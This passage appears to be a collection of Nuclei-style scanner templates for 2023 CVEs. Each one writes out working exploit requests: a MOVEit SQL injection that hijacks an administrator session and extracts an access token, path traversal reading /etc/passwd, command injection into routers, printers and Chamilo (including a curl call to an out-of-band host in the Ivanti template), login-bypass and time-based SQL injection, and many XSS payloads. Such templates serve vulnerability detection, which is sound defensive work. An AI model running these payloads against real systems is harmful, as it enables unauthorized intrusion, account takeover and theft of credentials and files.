/human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-24735","info":{"name":"PMB 7.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/opac_css/pmb.php?url=https://oast.me&hash={{md5('https://oast.me')}}"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-40931","info":{"name":"Nagios XI v5.11.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=acknowledge_banner_message&id=*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to acknowledge","SQL Error","right syntax to use near"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true}]}]},{"id":"CVE-2023-5561","info":{"name":"WordPress Core - Post Author Email Disclosure","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/{{route}}search=@"],"stop-at-first-match":true,"payloads":{"route":["wp-json/wp/v2/users?","?rest_route=/wp/v2/users&"]},"attack":"clusterbomb","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"application/json\")","contains_all(body, \"[{\\\"id\", \"name\\\":\", \"@\")"],"condition":"and"}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1","/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2766","info":{"name":"Weaver OA 9.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header,\"text/plain\")","contains_all(body, \"sdbuser =\",\"sdbpassword =\")"],"condition":"and"}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-33338","info":{"name":"Old Age Home Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=vaday%27+or+1%3D1%23&password=password&submit=\n","GET /admin/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Change Password\")","contains(body_2, \"Old Age Home Management System|| Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43662","info":{"name":"ShokoServer System - Local File Inclusion (LFI)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/Image/withpath/C:\\Windows\\win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1780","info":{"name":"Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"re not allowed to view\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-46574","info":{"name":"TOTOLINK A3700R - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"<title>TOTOLINK</title>\")"],"condition":"and"}]},{"raw":["GET /cgi-bin/cstecgi.cgi HTTP/1.1\nHost: {{Hostname}}\n\n{\"topicurl\":\"UploadFirmwareFile\",\"FileName\":\";id\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>prompt(document.domain)</script>","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=onerror=alert(document.domain)>\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-6875","info":{"name":"WordPress POST SMTP Mailer <= 2.8.7 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /wp-json/post-smtp/v1/connect-app HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-json/post-smtp/v1/get-log HTTP/1.1\nHost: {{Hostname}}\nAuth-Key: 0\nDevice: {{device}}\nFcm-Token: {{fcm_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"success\\\":true,\", \"{\\\"fcm_token\\\":\\\"{{fcm_token}}\")","contains_all(body_3, \"true,\\\"data\\\":\", \"access_token=\")"],"condition":"and"}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src/onerror=\"alert(document.domain)\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34755","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&pwdconfirm=test&blocked=0&deleted=0&status=0&login_page=0&userid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-24322","info":{"name":"mojoPortal 2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert('document.domain')","File Browser"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4451","info":{"name":"Cockpit - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Space :<img src=1 onerror=alert(document.domain)>: does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel < 11.109.9999.116 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror=\"prompt(document.domain)\">"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-34362","info":{"name":"MOVEit Transfer - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nCookie: siLockLongTermInstID=0\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyUsername: Guest\nX-siLock-SessVar1: MyPkgAccessCode: 123\nX-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@oast.me\nCookie: siLockLongTermInstID=0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: siLockLongTermInstID=0\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nArg06=123\n","@Host: https://checkip.amazonaws.com\nGET / HTTP/1.1\nHost: checkip.amazonaws.com\n","POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nAx-silock-transaction: folder_add_by_path\nX-siLock-Transaction: session_setvars\nX-siLock-SessVar0: MyPkgID: 0\nX-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('{{sessioncookie}}');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET InstId='1234' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET IpAddress='{{ips}}' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET Timeout='60' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET ResilNode='10' WHERE SessionID='{{sessioncookie}}';UPDATE activesessions SET AcctReady='1' WHERE SessionID='{{sessioncookie}}'; -- asdf\nCookie: siLockLongTermInstID=0\nContent-Length: 0\n","POST /guestaccess.aspx HTTP/1.1\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0\nContent-Type: application/x-www-form-urlencoded\n\nCsrfToken={{csrf}}&transaction=secmsgpost&Arg01=email_subject&Arg04=email_body&Arg06=123&Arg05=send&Arg08=email%40oast.me&Arg09=attachment_list\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{sessioncookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_7","words":["{\"access_token\":"]},{"type":"word","part":"header_7","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ips","regex":["\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"],"internal":true},{"type":"regex","name":"csrf","group":1,"regex":["name=\"csrftoken\" value=\"(\\w+)\">"],"internal":true,"part":"body"},{"type":"regex","name":"access_token","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body"}]}]},{"id":"CVE-2023-4714","info":{"name":"PlayTube 3.0.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["razorpay_options","PlayTube","key:"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","regex":["key: \"([a-z_A-Z0-9]+)\""]}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':","<img onerror=alert(document.domain) src=1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-48728","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"OpenGraph no video\")","status_code == 200 || status_code == 500","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2023-43323","info":{"name":"mooSocial 3.1.8 - External Service Interaction","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["mooConfig"],"internal":true}]},{"raw":["POST /activities/ajax_share HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38192","info":{"name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /superadmincreate.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPassword=a\"><script>alert(document.doamin);</script>&PasswordAgain=b&Language=de&SubmitBtn=Nutzer+erstellen\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"a\"><script>alert(document.doamin);</script>","SuperWebMailer"],"condition":"and","case-insensitive":true},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication 